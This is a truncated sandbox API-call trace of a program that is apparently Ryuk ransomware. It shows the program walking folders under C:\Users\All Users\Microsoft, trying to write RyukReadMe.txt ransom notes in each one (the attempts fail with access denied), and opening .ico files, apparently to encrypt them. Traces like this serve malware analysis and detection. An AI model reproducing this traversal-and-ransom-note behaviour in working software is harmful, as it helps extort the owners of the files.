CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.579] GetLastError () returned 0x5 [0159.579] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.579] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.579] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.579] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.579] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.579] SetLastError (dwErrCode=0x0) [0159.579] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Connections\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.580] GetLastError () returned 0x5 [0159.580] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.580] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.580] SetLastError (dwErrCode=0x0) [0159.580] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.580] GetLastError () returned 0x5 [0159.580] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.580] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0xffffffffffffffff [0159.580] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.580] SetLastError (dwErrCode=0x0) [0159.580] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.580] GetLastError () returned 0x5 [0159.580] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.580] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.580] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.580] SetLastError (dwErrCode=0x0) [0159.580] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.581] GetLastError () returned 0x5 [0159.581] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.581] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.581] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.581] SetLastError (dwErrCode=0x0) [0159.581] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.581] GetLastError () returned 0x5 [0159.581] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.581] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.581] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.581] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.581] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.581] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.581] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", dwFileAttributes=0x80) returned 0 [0159.581] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\assetlibrary.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.582] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.582] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.582] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.582] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.582] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", dwFileAttributes=0x80) returned 0 [0159.582] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\documentrepository.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.582] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.582] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.582] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.582] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.583] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico", dwFileAttributes=0x80) returned 0 [0159.583] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.583] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.583] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.583] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.583] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.583] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico", dwFileAttributes=0x80) returned 0 [0159.583] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.583] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.584] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.584] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.584] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.584] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico", dwFileAttributes=0x80) returned 0 [0159.584] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.584] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.584] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.584] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.584] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.584] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico", dwFileAttributes=0x80) returned 0 [0159.585] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.585] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.585] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.585] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.585] SetLastError (dwErrCode=0x0) [0159.585] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.585] GetLastError () returned 0x5 [0159.585] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.585] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.585] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.585] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.585] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.585] SetLastError (dwErrCode=0x0) [0159.585] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.586] GetLastError () returned 0x5 [0159.586] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.586] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.586] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.586] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.586] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.586] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.586] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.586] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.586] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.586] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.587] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.588] SetLastError (dwErrCode=0x0) [0159.588] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.590] GetLastError () returned 0x5 [0159.590] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.590] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.590] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.590] SetLastError (dwErrCode=0x0) [0159.590] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.591] GetLastError () returned 0x5 [0159.591] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.591] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.591] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.591] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.591] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.591] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.592] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.593] SetLastError (dwErrCode=0x0) [0159.593] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.595] GetLastError () returned 0x5 [0159.595] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.596] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.596] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.596] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.596] SetLastError (dwErrCode=0x0) [0159.596] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.596] GetLastError () returned 0x5 [0159.596] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.596] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.596] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.596] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.596] SetLastError (dwErrCode=0x0) [0159.596] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.596] GetLastError () returned 0x5 [0159.596] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.596] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.596] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.596] SetLastError (dwErrCode=0x0) [0159.596] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.597] GetLastError () returned 0x5 [0159.597] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.597] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.597] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.597] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.597] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.597] SetLastError (dwErrCode=0x0) [0159.597] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.597] GetLastError () 